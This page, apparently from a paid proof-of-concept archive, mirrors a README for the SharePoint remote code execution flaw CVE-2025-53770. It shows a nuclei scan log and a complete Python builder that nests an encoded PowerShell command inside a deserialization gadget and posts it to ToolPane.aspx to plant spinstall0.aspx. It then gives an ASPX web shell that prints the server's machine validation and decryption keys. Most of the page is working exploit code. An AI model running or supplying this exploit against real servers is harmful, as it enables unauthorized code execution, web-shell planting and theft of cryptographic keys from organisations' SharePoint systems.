Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-53770 PoC — Microsoft SharePoint Server Remote Code Execution Vulnerability

Source
https://github.com/go-bi/sharepoint-CVE-2025-53770
Associated Vulnerability
Title:Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2025-53770)
Description:Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network. Microsoft is aware that an exploit for CVE-2025-53770 exists in the wild. Microsoft is preparing and fully testing a comprehensive update to address this vulnerability. In the meantime, please make sure that the mitigation provided in this CVE documentation is in place so that you are protected from exploitation.
Description
CVE-2025-53770 实验环境
Readme
# sharepoint-CVE-2025-53770
CVE-2025-53770 实验环境
安装教程:
https://www.cnblogs.com/jianyus/p/9874010.html
https://www.cnblogs.com/life512/p/13713483.html
https://www.cnblogs.com/cqpanda/p/16148822.html
https://vladilen.com/content/sharepoint-keys
https://blog.csdn.net/liuzhenhe1988/article/details/112938419

测试:
https://github.com/projectdiscovery/nuclei/releases/tag/v3.4.10
```
└─$ ./nuclei -t http/cves/2025/CVE-2025-53770.yaml -u http://192.168.139.143

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[CVE-2025-53770] [http] [critical] http://192.168.139.143/_layouts/15/ToolPane.aspx/?DisplayMode=Edit&a=/ToolPane.aspx
[INF] Scan completed in 3.408841065s. 1 matches found.
```
上传:
```
import base64
import gzip
import urllib.parse
import requests

def BuildPayload(APSXPayloadFile: str):

    def Step1(APSXPayloadFile):
        with open(APSXPayloadFile, 'rb') as apsxp:
            Payload = apsxp.read()
        PayloadEncoded = base64.b64encode(Payload)
        return PayloadEncoded

    def Step2(PayloadEncoded):

        PowerShellPayload = f"""
$base64String = {PayloadEncoded}
$destinationFile = "C:\\PROGRA~1\\COMMON~1\\MICROS~1\\WEBSER~1\\16\\TEMPLATE\\LAYOUTS\\spinstall0.aspx"
$decodedBytes = [System.Convert]::FromBase64String($base64String)
$decodedContent = [System.Text.Encoding]::UTF8.GetString($decodedBytes)
$decodedContent | Set-Content -Path $destinationFile -ErrorAction Stop
"""

        PowerShellPayloadBase64Encoded = base64.b64encode(bytes(PowerShellPayload, 'utf-8')).decode('utf-8')

        PowerShellPayloadExecuterCommand = f"powershell -EncodedCommand {PowerShellPayloadBase64Encoded}"

        return PowerShellPayloadExecuterCommand

    def Step3(PowerShellPayloadExecuterCommand):

        PowerShellPayloadExecuterCommandBase64Encoded = base64.b64encode(bytes(PowerShellPayloadExecuterCommand,'utf-8')).decode('utf-8')
        Payload = f'<pwn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><ExpandedWrapperOfLosFormatterObjectDataProvider xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" ><ExpandedElement/><ProjectedProperty0><MethodName>Deserialize</MethodName><MethodParameters><anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string"> {PowerShellPayloadExecuterCommandBase64Encoded}</anyType></MethodParameters><ObjectInstance xsi:type="LosFormatter"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfLosFormatterObjectDataProvider></pwn>'

        PayloadBase64Encoded = base64.b64encode(bytes(Payload, 'utf-8')).decode('utf-8')
        PayloadGunziped = gzip.compress(bytes(PayloadBase64Encoded, 'utf-8'))
        return PayloadGunziped

    def Step4(PayloadGunziped):

        PayloadGunzipedBase64Encoded = base64.b64encode(PayloadGunziped).decode('utf-8')
        FinalPayload = f'<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %><%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %><asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest"><ProgressTemplate><div class="divWaiting"><Scorecard:ExcelDataSet CompressedDataTable="{PayloadGunzipedBase64Encoded}" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet></div</ProgressTemplate></asp:UpdateProgress>'
        FinalPayloadURLEncoded = urllib.parse.quote(FinalPayload)
        return FinalPayloadURLEncoded

    PayloadFileEncoded = Step1(APSXPayloadFile)
    #print(f"\nPayload File Base64 Encoded: {bytes(PayloadFileEncoded).decode('utf-8')}")

    PowerShellPayloadEncoded = Step2(bytes(PayloadFileEncoded).decode('utf-8'))
    #print(f"\nPowerShell Payload Base64 Encoded: {PowerShellPayloadEncoded}")

    PayloadGzipped = Step3(PowerShellPayloadEncoded)
    #print(f"\nPayload GZipped: {PayloadGzipped}")

    #PayloadUnGzipped = gzip.decompress(PayloadGzipped)
    #print(f"\nPayload Un Gzipped: {PayloadUnGzipped.decode('utf-8')}")

    FinalPayloadURLEncoded = Step4(PayloadGzipped)
    #print(f"\nFinal Payload URL Encoded: {FinalPayloadURLEncoded}")

    return FinalPayloadURLEncoded


def BuildHTTPRawRequest(TargetSite, TargetSiteSchema, UserAgent, Payload):

    RawRequest = f"""
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: {TargetSite}
User-Agent: {UserAgent}
Accept: */*
Referer: /_layouts/SignOut.aspx
Content-Type: application/x-www-form-urlencoded
Content-Length: {len(Payload)}

MSOTlPn_Uri={urllib.parse.quote(f"{TargetSiteSchema}{TargetSite}")}&MSOTlPn_DWP={urllib.parse.quote(Payload)}
"""
    return RawRequest


def RunAttack(TargetSite, TargetSiteSchemaPrefix, UserAgent, Payload):

    headers = {
        'User-Agent': UserAgent,
        'Referer': '/_layouts/SignOut.aspx',
        'Content-Type': 'application/x-www-form-urlencoded',
    }

    data = {
        'MSOTlPn_Uri': f'{TargetSiteSchemaPrefix}{TargetSite}',
        'MSOTlPn_DWP': Payload,
    }

    response = requests.post(
        f'{TargetSiteSchemaPrefix}{TargetSite}/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx',
        headers=headers,
        data=data,
        verify=False,
    )

    return response.text


def Start(TargetSite, TargetSiteSchemaPrefix, UserAgent, PayloadFilePath):
    Payload = BuildPayload(PayloadFilePath)
    RawHTTPRequest = BuildHTTPRawRequest(TargetSite, TargetSiteSchemaPrefix, UserAgent, Payload)
    print(f"\n {'-'*10} PoC Request {'-'*10}\n {RawHTTPRequest}")


if __name__ == "__main__":
    TargetSite = 'example.com'
    PayloadFilePath = 'pwn.aspx'
    TargetSiteSchemaPrefix = "http://"
    UserAgent = "example/0.0.0"
    Start(TargetSite, TargetSiteSchemaPrefix, UserAgent, PayloadFilePath)
```
利用
```
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script runat="server" language="c#" CODEPAGE="65001">
    public void Page_load()
       {
            var sy = System.Reflection.Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
            var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
            var gac = mkt.GetMethod("GetApplicationConfig", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);
            var cg = (System.Web.Configuration.MachineKeySection)gac.Invoke(null, new object[0]);
            Response.Write(cg.ValidationKey+"|"+cg.Validation+"|"+cg.DecryptionKey+"|"+cg.Decryption+"|"+cg.CompatibilityMode);
       }
</script>
```

链接:
https://hawktrace.com/blog/cve-2025-53772
https://github.com/BirdsAreFlyingCameras/CVE-2025-53770_Raw-HTTP-Request-Generator
https://github.com/hazcod/CVE-2025-53770
https://github.com/exfil0/CVE-2025-53770/tree/main
https://github.com/soltanali0/CVE-2025-53770-Exploit/tree/main
https://github.com/unk9vvn/sharepoint-toolpane
https://github.com/3a7/CVE-2025-53770/tree/main
https://github.com/saladin0x1/CVE-2025-53770
File Snapshot

 [4.0K]  /data/pocs/533e929966f6942861233eb09c2019e3b1c29371
└── [7.6K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →